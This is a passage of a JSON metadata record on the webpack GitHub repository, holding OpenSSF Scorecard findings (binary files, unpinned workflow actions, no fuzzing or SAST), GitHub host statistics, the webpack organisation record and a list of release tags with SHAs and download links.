settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1